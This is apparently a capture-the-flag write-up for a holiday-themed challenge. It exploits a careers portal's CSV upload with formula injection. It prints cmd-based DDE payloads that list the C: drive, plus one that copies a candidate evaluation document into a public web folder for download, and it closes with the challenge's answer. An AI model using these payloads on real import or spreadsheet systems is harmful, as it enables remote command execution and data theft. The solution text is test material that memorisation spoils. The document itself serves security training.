Santa uses an Elf Resources website to look for talented information security professionals. Gain access to the website and fetch the document
C:\candidate_evaluation.docx
. Which terrorist organization is secretly supported by the job applicant whose name begins with "K."
For hints on achieving this objective, please visit Sparkle Redberry and help her with the Dev Ops Fail Cranberry Pi terminal challenge.
CSV Injection Talk hint from
Somehow Brian Hostetler is giving a talk on CSV injection WHILE he's giving a talk on Trufflehog. Whatta' guy!
OWASP on CSV Injection hint from
OWASP CSV Injection Page
I wonder if Tangle Coalbox has taken a good look at his own employee import system.
It takes CSV files as imports. That certainly can expedite a process, but there's danger to be had.
I'll bet, with the right malicious input, some naughty actor could exploit a vulnerability there.
I'm sure the danger can be mitigated. OWASP has guidance on what not to allow with such uploads.
Opening Elf HR presents opportunity to upload CSV
file.
Opening non-existing URL, e.g. https://careers.kringlecastle.com/elfelfelf
returns 404
error code and reveals discloses information about file locations.
Combining these two things, let's try a simple CSV injection to execute a command.
=cmd|'/C DIR C:\ C:\careerportal\resources\public\temp.txt'!A1
Navigating to https://careers.kringlecastle.com/public/temp.txt
reveals that it worked!
Directory: C:\
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 12/6/2018 7:42 PM careerportal
d----- 10/9/2018 7:42 PM PerfLogs
d-r--- 10/23/2018 6:26 PM Program Files
d----- 10/23/2018 5:33 PM Program Files (x86)
da---- 10/23/2018 6:08 PM Python27
d-r--- 10/23/2018 7:06 PM Users
d----- 12/13/2018 4:20 AM Windows
-a---- 12/7/2018 7:57 PM 363073 candidate_evaluation.docx
Exfiltrate C:\candidate_evaluation.docx
by copying it into publicly accessible directory.
=cmd|'/C COPY C:\candidate_evaluation.docx C:\careerportal\resources\public\'!A1
Now it can be downloaded just by browsing to https://careers.kringlecastle.com/public/candidate_evaluation.docx
.
In candidate_evaluation.docx
document there is comment about candidate Krampus:
Krampus’s career summary included experience hardening decade old attack vectors, and lacked updated skills to meet the challenges of attacks against our beloved Holidays. Furthermore, there is intelligence from the North Pole this elf is linked to cyber terrorist organization Fancy Beaver who openly provides technical support to the villains that attacked our Holidays last year. We owe it to Santa to find, recruit, and put forward trusted candidates with the right skills and ethical character to meet the challenges that threaten our joyous season.
Answer to this objective is Fancy Beaver.